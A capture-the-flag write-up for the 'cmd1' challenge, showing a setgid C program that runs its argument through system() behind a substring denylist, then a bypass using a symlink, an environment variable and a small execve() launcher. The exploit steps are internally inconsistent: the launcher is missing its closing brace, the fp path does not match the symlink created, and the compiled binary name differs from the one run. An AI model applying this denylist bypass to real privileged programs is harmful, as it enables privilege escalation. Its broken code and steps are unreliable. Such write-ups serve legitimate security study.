- cmd1

0x00 Puzzle

Mommy! what is PATH environment in Linux?

ssh -p2222 (pw:guest)  

0x01 Explore


cmd1@ubuntu:~$ ls -l  
total 20  
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r-- 1 root root      319 Jul 14  2015 cmd1.c
-r--r----- 1 root cmd1_pwn   48 Jul 14  2015 flag


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

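/*
 * Count how many denylisted substrings ("flag", "sh", "tmp") occur in cmd.
 *
 * cmd: the command string that main() later hands to system(); may be NULL
 *      when the program is started without an argument.
 *
 * Returns the number of banned substrings found (0..3). A NULL cmd is
 * reported as 1 so the caller refuses it; the original passed NULL straight
 * into strstr(), which is undefined behaviour.
 *
 * NOTE: a substring denylist is not a security boundary for a string that
 * reaches system() -- the solution section of this page shows it being
 * sidestepped with a symlink and an environment variable. It is kept as-is
 * because it is the challenge's contract.
 */
int filter(char* cmd){
        static const char *const banned[] = { "flag", "sh", "tmp" };
        if (cmd == NULL) {
                return 1;
        }
        int r = 0;
        for (size_t i = 0; i < sizeof banned / sizeof banned[0]; i++) {
                /* strstr() returns NULL when the needle is absent */
                r += strstr(cmd, banned[i]) != NULL;
        }
        return r;
}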
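/*
 * Entry point: run argv[1] through the shell unless filter() rejects it.
 *
 * argc/argv: argv[1] is the command line to execute; envp is unused.
 *
 * Returns 0 in every case (argument missing, rejected, or executed), which
 * matches the original exit status.
 *
 * system() hands argv[1] to /bin/sh -c, so the invoker controls the whole
 * command line and filter() only narrows its vocabulary; per the ls -l
 * listing above the binary is also setgid to the flag's group. The argc
 * check is new: the original called filter(argv[1]) with a NULL argv[1]
 * when no argument was given, which is undefined behaviour in strstr().
 */
int main(int argc, char* argv[], char** envp){
        (void)envp; /* not used */
        if (argc < 2 || argv[1] == NULL) {
                return 0;
        }
        if (filter(argv[1])) {
                return 0;
        }
        system(argv[1]);
        return 0;
}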

0x02 Solution

  • Linking the flag with `ln -s ~/flag /tmp/flag` bypasses the 'flag' check.

  • Adding fp=/tmp/flag to the environment bypasses the 'tmp' check.

  • Using /bin/cat rather than /bin/bash or /bin/sh bypasses the 'sh' check.


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Launcher used in the write-up: starts ./cmd1 with a command string that
 * contains none of the filtered substrings ("flag", "sh", "tmp"); the file
 * path is carried by the fp environment variable instead, which filter()
 * never inspects because it only looks at argv[1].
 *
 * Review notes: envp[1] is implicitly NULL (partial initialisation zero-fills
 * the rest of the array), but argv has only two elements and no terminating
 * NULL -- execve(2) requires a NULL-terminated argv, so this depends on
 * whatever follows argv in memory happening to be zero. The execve() return
 * value is not checked; it only returns on failure.
 */
int main(){
    char *argv[2];
    char *envp[2] = {"fp=/tmp/cmdxhyu/f"};   /* envp[1] == NULL terminator */
    argv[0]="a"; // whatever
    argv[1]="/bin/cat $fp";                  /* $fp is expanded by the shell that system() spawns in cmd1 */
    execve("./cmd1", argv, envp);            /* replaces this process; returns only on error */
    return 0;
cmd1@ubuntu:/tmp$ ln -s ~/flag /tmp/flag  
cmd1@ubuntu:/tmp$ ln -s ~/cmd1 /tmp/cmd1  
cmd1@ubuntu:/tmp$ gcc -o xpl xpl.c  
cmd1@ubuntu:/tmp$ ./x  
mommy now I get what PATH environment is for :)